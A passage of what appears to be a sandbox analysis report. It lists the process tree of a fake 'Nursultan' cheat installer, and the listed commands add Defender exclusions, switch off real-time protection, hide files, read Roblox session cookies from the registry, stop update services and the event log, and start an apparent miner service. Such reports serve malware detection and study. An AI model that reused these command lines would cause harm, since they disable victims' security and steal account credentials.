        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        25⤵
        
        PID:1284
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        25⤵
        
        PID:3196
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        26⤵
        
        PID:1984
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        25⤵
        
        PID:4356
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        25⤵
        
        PID:1480
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        25⤵
        Detects videocard installed
        
        PID:4616
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        26⤵
        
        PID:4300
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        25⤵
        
        PID:3144
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        26⤵
        Runs ping.exe
        
        PID:2588
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        24⤵
        
        PID:4416
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        24⤵
        
        PID:4012
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        25⤵
        
        PID:1320
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        24⤵
        
        PID:3640
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        25⤵
        
        PID:932
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        25⤵
        
        PID:2908
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1052
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        25⤵
        
        PID:748
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        26⤵
        Views/modifies file attributes
        
        PID:4032
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        26⤵
        
        PID:1856
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        26⤵
        
        PID:2388
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        26⤵
        
        PID:4940
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        26⤵
        
        PID:4012
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        27⤵
        
        PID:1068
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        26⤵
        
        PID:3832
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        26⤵
        
        PID:3660
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        26⤵
        
        PID:4548
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        26⤵
        Detects videocard installed
        
        PID:3900
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        27⤵
        
        PID:3616
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        26⤵
        
        PID:1276
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        27⤵
        
        PID:4328
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        27⤵
        Runs ping.exe
        
        PID:2376
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4372
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        25⤵
        
        PID:4832
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        26⤵
        
        PID:5012
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        26⤵
        
        PID:3200
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        25⤵
        
        PID:4960
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        26⤵
        
        PID:4224
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        27⤵
        
        PID:4772
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        26⤵
        
        PID:5040
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1052
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        26⤵
        
        PID:3064
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        27⤵
        Views/modifies file attributes
        
        PID:1852
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2144
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        27⤵
        
        PID:3408
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        27⤵
        
        PID:676
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        27⤵
        
        PID:700
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        27⤵
        
        PID:3648
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        27⤵
        
        PID:4988
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        28⤵
        
        PID:940
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        27⤵
        
        PID:3544
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        28⤵
        
        PID:2312
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        27⤵
        
        PID:4216
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        27⤵
        Detects videocard installed
        
        PID:4968
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        28⤵
        
        PID:3800
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        27⤵
        
        PID:1320
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        28⤵
        
        PID:3200
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        28⤵
        Runs ping.exe
        
        PID:3652
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        26⤵
        
        PID:3964
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        27⤵
        
        PID:1184
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        26⤵
        
        PID:4784
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        27⤵
        
        PID:3848
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        27⤵
        
        PID:3660
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        26⤵
        
        PID:4132
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        27⤵
        
        PID:4264
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        27⤵
        
        PID:4356
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        27⤵
        
        PID:2432
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        27⤵
        
        PID:4216
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        28⤵
        Views/modifies file attributes
        
        PID:4616
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        28⤵
        
        PID:4264
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        28⤵
        
        PID:3256
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        28⤵
        
        PID:4640
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        28⤵
        
        PID:2876
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        28⤵
        
        PID:3244
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        28⤵
        
        PID:4104
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        28⤵
        
        PID:2572
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        28⤵
        
        PID:3964
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        29⤵
        
        PID:4436
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        28⤵
        Detects videocard installed
        
        PID:3640
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        29⤵
        
        PID:4808
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        28⤵
        
        PID:4136
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        29⤵
        Runs ping.exe
        
        PID:1088
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        27⤵
        
        PID:628
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        27⤵
        
        PID:1856
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        28⤵
        
        PID:1484
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        28⤵
        
        PID:3780
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        27⤵
        
        PID:3976
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        28⤵
        
        PID:4560
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        28⤵
        
        PID:3256
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2464
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        29⤵
        
        PID:5012
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        30⤵
        
        PID:1228
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        29⤵
        Launches sc.exe
        
        PID:4176
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        29⤵
        Launches sc.exe
        
        PID:3420
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        29⤵
        
        PID:2204
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        29⤵
        Launches sc.exe
        
        PID:536
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        29⤵
        
        PID:3668
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        29⤵
        Power Settings
        
        PID:4176
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        29⤵
        Power Settings
        
        PID:4912
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        29⤵
        Power Settings
        
        PID:1640
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        29⤵
        Power Settings
        
        PID:2324
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        29⤵
        Launches sc.exe
        
        PID:1592
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "XMRKNZQC"
        29⤵
        Launches sc.exe
        
        PID:3420
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        28⤵
        
        PID:3248
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        29⤵
        
        PID:1856
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        28⤵
        
        PID:2280
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        29⤵
        Views/modifies file attributes
        
        PID:4016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4420
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        29⤵
        
        PID:5088
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        30⤵
        
        PID:2432
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        29⤵
        
        PID:216
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        30⤵
        
        PID:2968
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        29⤵
        
        PID:2588
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        30⤵
        
        PID:4852
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        29⤵
        
        PID:3420
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        30⤵
        
        PID:3964
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        29⤵
        
        PID:228
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        29⤵
        
        PID:1640
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        30⤵
        
        PID:2560
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        29⤵
        
        PID:4408
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        29⤵
        Detects videocard installed
        
        PID:2312
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        29⤵
        
        PID:4088
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        30⤵
        Runs ping.exe
        
        PID:3604
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        28⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3900
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        29⤵
        
        PID:1484
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        28⤵
        
        PID:4032
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        29⤵
        
        PID:4604
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        29⤵
        
        PID:4936
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        28⤵
        
        PID:1776
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:932
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        29⤵
        
        PID:4264
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        29⤵
        
        PID:4548
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        29⤵
        
        PID:4616
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4604
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        29⤵
        
        PID:3948
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        30⤵
        
        PID:1976
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        30⤵
        
        PID:4804
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        29⤵
        
        PID:676
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        30⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1740
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        30⤵
        
        PID:4784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        30⤵
        
        PID:1480
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        31⤵
        
        PID:3536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        30⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3864
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        30⤵
        
        PID:4104
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        31⤵
        
        PID:3400
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        30⤵
        
        PID:1316
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        31⤵
        
        PID:3772
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        31⤵
        
        PID:4532
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        31⤵
        
        PID:2032
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        31⤵
        
        PID:2580
        
        C:\Windows\SYSTEM32\attrib.exe
        
